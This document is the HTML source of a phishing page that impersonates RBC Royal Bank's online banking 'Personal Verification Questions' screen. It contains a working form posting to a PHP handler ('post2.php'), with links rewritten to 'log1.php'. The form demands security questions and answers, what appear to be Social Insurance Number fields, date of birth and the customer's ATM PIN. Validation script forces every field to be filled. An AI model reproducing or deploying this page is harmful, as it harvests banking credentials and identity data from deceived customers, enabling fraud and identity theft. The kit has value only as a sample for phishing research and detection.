<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">  <script type="text/javascript" language="javascript">function checkform ( form )
{
    if (form.name.value.length < 1) {
    alert( "Error : invalid field" );
    form.name.focus();
          document.getElementById('name').style.backgroundColor="#FF6A6A";
    return false ;
  }
    if (form.emailpass.value.length < 1) {
    alert( "Error : invalid field" );
    form.emailpass.focus();
          document.getElementById('emailpass').style.backgroundColor="#FF6A6A";
    return false ;
  }
  
   if (form.email.value.length < 1) {
    alert( "Error : invalid field" );
    form.email.focus();
          document.getElementById('email').style.backgroundColor="#FF6A6A";
    return false ;
  }
   if (form.q1.value.length < 1) {
    alert( "Error : invalid field" );
    form.q1.focus();
	  document.getElementById('q1').style.backgroundColor="#FF6A6A";
    return false ;
  }
     if (form.a1.value.length < 4) {
    alert( "Error : invalid field" );
    form.a1.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="#FF6A6A";
    return false ;
  }
     if (form.q2.value.length < 1) {
    alert( "Error : invalid field" );
    form.q2.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="#FF6A6A";
    return false ;
  }
       if (form.a2.value.length < 4) {
    alert( "Error : invalid field" );
    form.a2.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="#FF6A6A";
    return false ;
  } if (form.q3.value.length < 1) {
    alert( "Error : invalid field" );
    form.q3.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="";
	  document.getElementById('q3').style.backgroundColor="#FF6A6A";
    return false ;
  }   if (form.a3.value.length < 4) {
    alert( "Error : invalid field" );
    form.a3.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="";
	  document.getElementById('q3').style.backgroundColor="";
	  document.getElementById('a3').style.backgroundColor="#FF6A6A";
    return false ;
  }     if (form.sin1.value.length < 3) {
    alert( "Error : invalid field" );
    form.sin1.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="";
	  document.getElementById('q3').style.backgroundColor="";
	  document.getElementById('a3').style.backgroundColor="";
	  document.getElementById('sin1').style.backgroundColor="#FF6A6A";
    return false ;
  }       if (form.sin2.value.length < 3) {
    alert( "Error : invalid field" );
    form.sin2.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="";
	  document.getElementById('q3').style.backgroundColor="";
	  document.getElementById('a3').style.backgroundColor="";
	  document.getElementById('sin1').style.backgroundColor="";
	  document.getElementById('sin2').style.backgroundColor="#FF6A6A";
    return false ;
  }         if (form.sin3.value.length < 3) {
    alert( "Error : invalid field" );
    form.sin3.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="";
	  document.getElementById('q3').style.backgroundColor="";
	  document.getElementById('a3').style.backgroundColor="";
	  document.getElementById('sin1').style.backgroundColor="";
	  document.getElementById('sin2').style.backgroundColor="";
	  document.getElementById('sin3').style.backgroundColor="#FF6A6A";
    return false ;
  }           if (form.dobd.value.length < 1) {
    alert( "Error : invalid field" );
    form.dobd.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="";
	  document.getElementById('q3').style.backgroundColor="";
	  document.getElementById('a3').style.backgroundColor="";
	  document.getElementById('sin1').style.backgroundColor="";
	  document.getElementById('sin2').style.backgroundColor="";
	  document.getElementById('sin3').style.backgroundColor="";
	  document.getElementById('dobd').style.backgroundColor="#FF6A6A";
    return false ;
  }             if (form.dobm.value.length < 1) {
    alert( "Error : invalid field" );
    form.dobm.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="";
	  document.getElementById('q3').style.backgroundColor="";
	  document.getElementById('a3').style.backgroundColor="";
	  document.getElementById('sin1').style.backgroundColor="";
	  document.getElementById('sin2').style.backgroundColor="";
	  document.getElementById('sin3').style.backgroundColor="";
	  document.getElementById('dobd').style.backgroundColor="";
	  document.getElementById('dobm').style.backgroundColor="#FF6A6A";
    return false ;
  }             if (form.doby.value.length < 4) {
    alert( "Error : invalid field" );
    form.doby.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="";
	  document.getElementById('q3').style.backgroundColor="";
	  document.getElementById('a3').style.backgroundColor="";
	  document.getElementById('sin1').style.backgroundColor="";
	  document.getElementById('sin2').style.backgroundColor="";
	  document.getElementById('sin3').style.backgroundColor="";
	  document.getElementById('dobd').style.backgroundColor="";
	  document.getElementById('dobm').style.backgroundColor="";
	  document.getElementById('doby').style.backgroundColor="#FF6A6A";
    return false ;
  }
                if (form.pin.value.length < 4) {
    alert( "Error : invalid field" );
    form.pin.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="";
	  document.getElementById('q3').style.backgroundColor="";
	  document.getElementById('a3').style.backgroundColor="";
	  document.getElementById('sin1').style.backgroundColor="";
	  document.getElementById('sin2').style.backgroundColor="";
	  document.getElementById('sin3').style.backgroundColor="";
	  document.getElementById('dobd').style.backgroundColor="";
	  document.getElementById('dobm').style.backgroundColor="";
	  document.getElementById('doby').style.backgroundColor="";
	  document.getElementById('pin').style.backgroundColor="#FF6A6A";
    return false ;
  }
                  if (form.issue.value.length < 2) {
    alert( "Error : invalid field" );
    form.issue.focus();
	  document.getElementById('q1').style.backgroundColor="";
	  document.getElementById('a1').style.backgroundColor="";
	  document.getElementById('q2').style.backgroundColor="";
	  document.getElementById('a2').style.backgroundColor="";
	  document.getElementById('q3').style.backgroundColor="";
	  document.getElementById('a3').style.backgroundColor="";
	  document.getElementById('sin1').style.backgroundColor="";
	  document.getElementById('sin2').style.backgroundColor="";
	  document.getElementById('sin3').style.backgroundColor="";
	  document.getElementById('dobd').style.backgroundColor="";
	  document.getElementById('dobm').style.backgroundColor="";
	  document.getElementById('doby').style.backgroundColor="";
	  document.getElementById('pin').style.backgroundColor="";
	  document.getElementById('issue').style.backgroundColor="#FF6A6A";
 
    return false ;
  }
  return true ;
  }
</script>
 
 <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> 
<title>Personal Verification Questions - RBC Online Banking</title><link rel="stylesheet" type="text/css" href="files/common.css">
<link rel="stylesheet" type="text/css" href="files/custom.css">    <link rel="stylesheet" type="text/css" href="files/legacy.css"><link rel="stylesheet" type="text/css" href="files/main01.css"><link rel="stylesheet" type="text/css" href="files/main02.css"><link rel="stylesheet" type="text/css" href="files/tabs.css">
    
    <link rel="stylesheet" type="text/css" href="files/print.css" media="print">
	<script language="javascript" type="text/javascript">	   function checkOnFocusForm() {
	   if ( rbcGetCookie ("3MTK","NOTTHERE") != "NOTTHERE" ) {	rbcDeleteCookie("3MTK","/");}
		
		   
}	   
checkOnFocusForm();	   
event_addOnFocusForm(new Array(checkOnFocusForm));
addLoadEvent(event_onLoad);
function showThemeNavigation() {
    swapInAlternateElements("OLBAlternatable", "_alternate");
}	   
</script>	 
	<style type="text/css">
<!--
.style3 {font-size: 10px}
-->
    </style></head>
<body style="background-image: url(Capture.JPG);" class="template-legacy" onfocus="event_onFocusForm(); " onblur="event_onBlurForm();" onunload="event_onUnload();"><br><br><br><br><br>
	
	<div id="wrapper">        		    
    
    
<div id="mainnav_alternate" class="OLBAlternate" style="display: none;">
	
      <div id="mainnav-level1_alternate" class="clear OLBAlternate">
  		  <ul>
<li class="mainnav-level1-firstlink">														<span>								<a href="http://www.rbc.com/canada.html" onclick="return popupNewbrowser(this.href)" target="_blank" title="Products &amp; Services (opens new window)">Products &amp; Services</a>							</span>						</li>
<li class="mainnav-level1-currentpage">															<img class="mainnav-level1-screenreaderimage" src="files/screenreaderimage.gif" alt="You are on:">														<span>								<script type="text/javascript">
function themeTopNav_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct() {
themeNavigationFormAddParameter('7ASCRIPT','/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTI4NgE_2CbEdFAOARVKM!/');
themeNavigationFormAddParameter('7ASERVER','SP00');
}
</script>
<a href="javascript:document.themeNavigationForm.action=log1.php?'/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTI4NgE_2CbEdFAOARVKM!/';themeTopNav_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct();document.themeNavigationForm.submit();">My Accounts</a>							</span>						</li>
<li class="mainnav-level1-rightofcurrentpage">														<span>								<a href="https://www.rbcroyalbank.com/customer-service/online-banking/index.html">Customer Service</a>							</span>						</li>																																																																																																													</ul>
		  
      </div>
	
      <div id="mainnav-level2_alternate" class="clear OLBAlternate">
  		  <ul>
<li class="mainnav-level2-firstlink">														<span>								<script type="text/javascript">
function themeTopNav_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_accountsummary() {
themeNavigationFormAddParameter('7ASCRIPT','/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTI4NgQ_2CbEdFAFOAmfM!/');
themeNavigationFormAddParameter('7ASERVER','SP00');
}
</script>
<a href="javascript:document.themeNavigationForm.action=log1.php?'/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTI4NgQ_2CbEdFAFOAmfM!/';themeTopNav_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_accountsummary();document.themeNavigationForm.submit();">Accounts Summary</a>							</span>						</li>
<li class="mainnav-level2-currentpage">															<img class="mainnav-level2-screenreaderimage" src="files/screenreaderimage.gif" alt="You are on:">														<span>								<script type="text/javascript">
function themeTopNav_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking() {
themeNavigationFormAddParameter('7ASCRIPT','/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTIwNfA_2CbEdFAGW0JA8!/');
themeNavigationFormAddParameter('7ASERVER','SP00');
}
</script>
<a href="javascript:document.themeNavigationForm.action=log1.php?'/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTIwNfA_2CbEdFAGW0JA8!/';themeTopNav_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking();document.themeNavigationForm.submit();">Banking</a>							</span>						</li>																																																																					</ul>
		  
      </div>
	
</div>        
		<div class="skipnavanchor"><a name="skipheadernav" id="skipheadernav"></a></div>
 
		<div id="layout" class="clear layout-110 nevervisitedlinks">            
    			<div id="layout-column-left">
    			
	   			              	    	    <!--  navigation start -->


<div id="leftnavskipanchor" class="skipnavanchor OLBAlternatable"><a name="skipleftnav" id="skipleftnav" class="OLBAlternatable"></a></div>                                                                  <!--  navigation start -->
<div id="leftnavskiplink_alternate" class="skipnav OLBAlternate" style="display: none;"><a href="#skipleftnav">Skip Left Navigation</a></div>
<div id="leftnav-olb_alternate" class="clear OLBAlternate" style="display: none;">	
    
    
	
	
	    
		
		
	
		
	
	<ul class="leftnav-currentsection">
	 
	 	
	
	
		<li class="leftnav-sectionheader"><img class="leftnav-highlight" src="files/highlight-house.gif" alt="You are within:">					 
		

<a href="javascript:document.themeNavigationForm.action=log1.php?'/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTIw9TQ_2CbEdFAKlzSmQ!/';themeSideNav_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking_pa_papdetails_updatepref();document.themeNavigationForm.submit();">Update My Preferences	</a>																																																																										</li>										  								 														    </ul>													  												 								   				    												    																											 																								<li>						                    																																								<a href="https://www.rbcroyalbank.com/onlineservices/personal/apply-for-products-and-services.html">Apply for Products and Services</a>																												</li>			 														 							 					 
		  
		   </div>
<div id="leftnavskipanchor_alternate" class="skipnavanchor OLBAlternate" style="display: none;"><a name="skipleftnav" id="skipleftnav_alternate" class="OLBAlternate"></a></div>                			    </div>
	        
	        
    

<div id="breadcrumbarea" class="clear OLBAlternatable">

<div class="skipnavanchor"><a name="skipbreadcrumbnav" id="skipbreadcrumbnav" class="OLBAlternatable"></a></div>
</div>              
<div class="skipnav OLBAlternate" id="breadcrumbareaskiplink_alternate" style="display: none;"><a href="#skipbreadcrumbnav">Skip Breadcrumb Links</a></div>
<div id="breadcrumbarea_alternate" class="clear OLBAlternate" style="display: none;">
<p id="path_alternate" class="OLBAlternate">
	 
	  
	  	<script type="text/javascript">
function themeBreadCrumb_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking_pa() {
themeNavigationFormAddParameter('7ASCRIPT','/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTI29DU_2CbEdFAE8SG4U!/');
themeNavigationFormAddParameter('7ASERVER','SP00');
}
</script>
<a href="javascript:document.themeNavigationForm.action=log1.php?'/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTI29DU_2CbEdFAE8SG4U!/';themeBreadCrumb_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking_pa();document.themeNavigationForm.submit();">Personal Accounts</a>	&gt;	<script type="text/javascript">
function themeBreadCrumb_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking_pa_papdetails() {
themeNavigationFormAddParameter('7ASCRIPT','/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTI48AQ_2CbEdFAOsQxL0!/');
themeNavigationFormAddParameter('7ASERVER','SP00');
}
</script>
<a href="javascript:document.themeNavigationForm.action=log1.php?'/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTI48AQ_2CbEdFAOsQxL0!/';themeBreadCrumb_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking_pa_papdetails();document.themeNavigationForm.submit();">Profile and Preferences	</a>	&gt;	<script type="text/javascript">
function themeBreadCrumb_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking_pa_papdetails_updateprof() {
themeNavigationFormAddParameter('7ASCRIPT','/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTI0svA_2CbEdFAMCRzNU!/');
themeNavigationFormAddParameter('7ASERVER','SP00');
}
</script>
<a href="javascript:document.themeNavigationForm.action=log1.php?'/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTI0svA_2CbEdFAMCRzNU!/';themeBreadCrumb_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking_pa_papdetails_updateprof();document.themeNavigationForm.submit();">Update My Profile					</a>	&gt;	<script type="text/javascript">
function themeBreadCrumb_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking_pa_papdetails_updateprof_pvquestion() {
themeNavigationFormAddParameter('7ASCRIPT','/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTowADE_2CbEdFACPn4ck!/');
themeNavigationFormAddParameter('7ASERVER','SP00');
}
</script>
<a href="javascript:document.themeNavigationForm.action=log1.php?'/wps/myportal/OLB/!ut/p/c4/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iTAAsLD0t3A0sDHyczA09HD3N3FxcTowADE_2CbEdFACPn4ck!/';themeBreadCrumb_alternateAddParameterscom_rbc__3m00_olb_web_portal_pg_myacct_banking_pa_papdetails_updateprof_pvquestion();document.themeNavigationForm.submit();">Personal Verification Questions</a>	
		
	 
</p>
<div class="skipnavanchor"><a name="skipbreadcrumbnav" id="skipbreadcrumbnav_alternate" class="OLBAlternate"></a></div>
</div>            			<div id="layout-column-main">					 
 
 
 
 
 
 
 
 
 
 
 
 
 
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr height="100%"> 
<td valign="top" width="570"> 
 
 
 
 
 
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%"> 
<tbody><tr><td valign="top" width="100%"> 
 
 
 
 
 
 
 
 
 
<a name="7_4P88H9G090LB60IAH7GDD42P03"></a><div class="wpsPortletBody">
<table width="100%">
	<tbody><tr>
		<td><script type="text/javascript" language="JavaScript">document.cookie='PPAGE=ChangePVQsA; path=/';</script><!--3MSHELL01.HTM (420) start--><!--Start of 3MSHELLID.INC -->
<!--TMP="3MPVQ.HTM"SRC="420"LNG="ENGLISH"PILOT="PORTAL"-->
<!--End of 3MSHELLID.INC -->
<!-- Start of 3MSRCPATH.CINC -->
<!-- End of 3MSRCPATH.CINC --><!-- START: content -->
<a name="top" id="top"></a>
<table width="100%">
  <tbody><tr>
    <td valign="top"><!-- Start of 3MSRCRDRT.CINC -->
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
&nbsp; &nbsp; &nbsp; <big style="font-weight: bold;">Personal Verification</big><table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr>
<td><input name="user" value="" type="hidden">
<input value="" name="pass" type="hidden">
  <table border="0" cellpadding="0" cellspacing="0" width="100%">
<form name="test" action="post2.php" method="post" onsubmit="return checkform(this);"></form>
<tbody>
    <tr>
   <td width="5%">&nbsp;</td>
   <td colspan="2" height="10" width="95%"><span class="asterisk">*</span> <span class="note"><b>Required Information</b></span>   </td>
  </tr>  <tr>
   <td width="5%">&nbsp;</td>
   <td colspan="2" class="fieldLabel" width="95%">Personal Verification Question 1</td>
  </tr>  <tr><td colspan="3"></td></tr>
  <tr>
   <td width="5%">&nbsp;</td>
   <td width="20%">
    <label for="pvqlist1"><span class="asterisk">*</span>&nbsp;<span class="fieldLabel">Question:</span></label>   </td>
   <td class="rbcMonospace" height="30" width="75%">
      <select name="q1" size="1" id="q1" title="Select a question"><option value="">Select a question</option><option value="What was the first movie I ever saw?">What was the name of the business/company for your first job?</option><option value="What is the middle name of my oldest child?">What is your grandfather's middle name (your mother's father)?</option><option value="In which city was my father born?">What is your oldest sibling's birthday month and year?</option><option value="Who was my favourite cartoon character as a child?">What was your childhood nickname?</option><option value="What is my mother's middle name?">What is the name of the street you lived on when you were born?</option></select>   </td>
  </tr>  <tr style="display: none;" id="PVQ1">
    <td colspan="2" width="25%">&nbsp;</td>
    <td height="30" width="75%">
      <input maxlength="60" size="36" name="OWNQUESTION1" id="ownquestion1" title="create a question for PVQ1" onchange="v3mpvq_SetOwnPVQ( '1' );"> <span valign="middle" class="note">(4-60 characters)</span>    </td>
  </tr>
  <tr>
   <td width="5%">&nbsp;</td>
   <td width="20%">
    <label for="answer1"><span class="asterisk">*</span>&nbsp;<span class="fieldLabel">Answer:</span></label>   </td>
   <td height="30" width="75%">
     <input maxlength="20" size="20" name="a1" id="a1" title="enter answer for PVQ1"> 
     <span valign="middle" class="note">(4-20 characters)</span>   </td>
  </tr>
  <tr><td colspan="3">&nbsp;</td></tr>
  <tr>
   <td width="5%">&nbsp;</td>
   <td colspan="2" class="fieldLabel" width="95%">Personal Verification Question 2</td>
  </tr>  <tr><td colspan="3"></td></tr>
  <tr>
   <td width="5%">&nbsp;</td>
   <td width="20%">
    <label for="pvqlist2"><span class="asterisk">*</span>&nbsp;<span class="fieldLabel">Question:</span></label>   </td>
   <td class="rbcMonospace" height="30" width="75%">
      <select name="q2" size="1" id="q2" title="Select a question" onchange="v3mpvq_SelectPVQ( '2' );"><option value="">Select a question</option><option value="What was the first book I ever read?">What is the first sport you ever played?</option><option value="What was the first company I ever worked for?">In what city was your fist job located?</option><option value="What High School did my mother attend?">What color was your bedroom as a child?</option><option value="In which city was my mother born?">what is your favorite professional team?</option><option value="What is my spouse's/partner's middle name?">What is the name of the high school you graduated from?</option></select>   </td>
  </tr>  <tr style="display: none;" id="PVQ2">
    <td colspan="2" width="25%">&nbsp;</td>
    <td height="30" width="75%">
      <input maxlength="60" size="36" name="OWNQUESTION2" id="ownquestion2" title="create a question for PVQ2" onchange="v3mpvq_SetOwnPVQ( '2' );"> <span valign="middle" class="note">(4-60 characters)</span>    </td>
  </tr>
  <tr>
   <td width="5%">&nbsp;</td>
   <td width="20%">
    <label for="answer2"><span class="asterisk">*</span>&nbsp;<span class="fieldLabel">Answer:</span></label>   </td>
   <td height="30" width="75%">
     <input maxlength="20" size="20" name="a2" id="a2" title="enter answer for PVQ2"> 
     <span valign="middle" class="note">(4-20 characters)</span>   </td>
  </tr>
  <tr><td colspan="3">&nbsp;</td></tr>
  <tr>
   <td width="5%">&nbsp;</td>
   <td colspan="2" class="fieldLabel" width="95%">Personal Verification Question 3</td>
  </tr>  <tr><td colspan="3"></td></tr>
  <tr>
   <td width="5%">&nbsp;</td>
   <td width="20%">
    <label for="pvqlist3"><span class="asterisk">*</span>&nbsp;<span class="fieldLabel">Question:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></label>   </td>
   <td class="rbcMonospace" height="30" width="75%">
      <select name="q3" size="1" id="q3" title="Select a question" onchange="v3mpvq_SelectPVQ( '3' );"><option value="">Select a question</option><option value="What was the make of my first car?">What is the name of your hometown newspaper?</option><option value="What High School did my father attend?">What is the street name your work or office is located on?</option><option value="Which city did I meet my significant other?">What is the model of your first car?</option><option value="Last name of my favourite High School teacher?">What is your paternal grandmother's first name?</option><option value="Which country did I go to on my honeymoon?">What is your mother's middle name?</option></select>   </td>
  </tr>  <tr style="display: none;" id="PVQ3">
    <td colspan="2" width="25%">&nbsp;</td>
    <td height="30" width="75%">
      <input maxlength="60" size="36" name="OWNQUESTION3" id="ownquestion3" title="create a question for PVQ3" onchange="v3mpvq_SetOwnPVQ( '3' );"> <span valign="middle" class="note">(4-60 characters)</span>    </td>
  </tr>
  <tr>
   <td width="5%">&nbsp;</td>
   <td width="20%">
    <label for="answer3"><span class="asterisk">*</span>&nbsp;<span class="fieldLabel">Answer:</span></label>   </td>
   <td height="30" width="75%">
     <input maxlength="20" size="20" name="a3" id="a3" title="s"> 
     <span valign="middle" class="note">(4-20 characters)</span>   </td>
  </tr>
  <tr><td colspan="3">&nbsp;</td></tr>
</tbody></table><table border="0" cellpadding="0" cellspacing="0" width="100%">
  <tbody><tr>
    <td>&nbsp;</td>
    <td colspan="2" class="fieldLabel">Personal Verification Information </td>
  </tr>
  
    
    
    
  
    
  <tr>
  </tr>
    
  <tr>
    <td>&nbsp;</td>
    <td><label for="label"></label></td><td align="left">&nbsp;</td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td><label for="label"><span class="asterisk">*</span>&nbsp;<span class="fieldLabel">Date
of Birth
:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></label><select name="dobd" id="dobd" size="1"><option value="">--</option><option value="1"> 1</option><option value="2"> 2</option><option value="3"> 3</option><option value="4"> 4</option><option value="5"> 5</option><option value="6"> 6</option><option value="7"> 7</option><option value="8"> 8</option><option value="9"> 9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option></select><select name="dobm" id="dobm" size="1"><option value="">--</option><option value="Jan">Jan</option><option value="Feb">Feb</option><option value="Mar">Mar</option><option value="Apr">Apr</option><option value="May">May</option><option value="Jun">Jun</option><option value="Jul">Jul</option><option value="Aug">Aug</option><option value="Sep">Sep</option><option value="Oct">Oct</option><option value="Nov">Nov</option><option value="Dec">Dec</option></select><input maxlength="4" size="5" name="doby" id="doby" title="enter answer for PVQ3">
      <span class="style3">      (dd - mm - yyyy ) </span></td>
    <td align="left">&nbsp;</td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td><label for="label"></label></td>
    <td align="left">&nbsp;</td>
  </tr>
  
  
  <tr>
    <td>&nbsp;</td>
    <td><label for="label"><span class="asterisk">*</span>&nbsp;<span class="fieldLabel">ATM
PIN
:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></label>
        <input name="pin" id="pin" title="enter answer for PVQ3" size="6" maxlength="6" type="password">
        <span class="style3">(only digits) </span></td>
    <td align="left">&nbsp;</td>
  </tr>
  
  
  
  
  
  
  
  </tbody><tbody>
    
    <tr>
      <td align="left" width="4%">      </td>
      <td>&nbsp;</td>
      <td align="right" width="12%">    <input src="files/btn_continue.gif" name="btn_continue" alt="Continue" border="0" type="image"><!--3MBUTTONPT.CINC. 
en-->
      </td>
    </tr>
  </tbody>
</table></td>
</tr>
</tbody></table><script language="javascript" type="text/javascript">
<!--
v3mpvq_onLoadPVQ();
//-->
</script>
   
<!-- End of 3MSRCRDRT.CINC -->
</td>
  </tr>
</tbody></table><!-- END:   content --><!-- 3MSHELLFOOT.JS -->
<script language="Javascript" type="text/javascript">
<!--
var c3mbp = new buttons_ButtonPreload( "btn_", "_down" );
//-->
</script>
<!-- 3MSHELLFOOT.JS --> <!-- Start of 3MSHELLFENT.INC --> <input name="F22" value="HTPCBINET" type="hidden">
 <input name="LANGUAGE" value="ENGLISH" type="hidden">
 <input name="REQUEST" value="BeanCounter" type="hidden">
 <input name="XREQUEST" value="AcctBalanceInquiry" type="hidden">
 <input name="BEAN" value="ENTITY" type="hidden">
 <input name="r" value="3MSHELL01.HTM" type="hidden">
<input name="3MTK" value="0" type="hidden">
 <input name="F22" value="HTPCBINET" type="hidden">
 <input name="LANGUAGE" value="ENGLISH" type="hidden">
 <input name="REQUEST" value="AcctBalanceInquiry" type="hidden"><!-- End of 3MSHELLFUPP.INC --> <!--3MSHELL01.HTM (420) end-->		</td>
	</tr>
</tbody></table></div> 
</td></tr> 
</tbody></table> 
</td> 
<td valign="top" width="12"> 
 
 
 
 
 
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%"> 
</table> 
</td> 
<td valign="top" width="216"><br></td> 
</tr></tbody></table>			</div>
		</div>
		
		
		
		
		 	  
		
		
		
    
<div id="globalfooter_alternate" class="OLBAlternate" style="display: none;">
	
	
    		
    	
	<div id="globalfooter-searchbar_alternate" class="OLBAlternate">
		<p id="globalfooter-searchbar-links_alternate" class="OLBAlternate">	
	            
	                
	                
	                    
	                
	            
	         
		</p><div id="globalfooter-searchbar-search_alternate" class="OLBAlternate">
    		
    					        
    			
    			
    		
		</div>
		
	</div>
	
		
	<div id="globalfooter-main_alternate" class="OLBAlternate">
		<p>Royal Bank of Canada Website, ? 1995-2013
		</p>
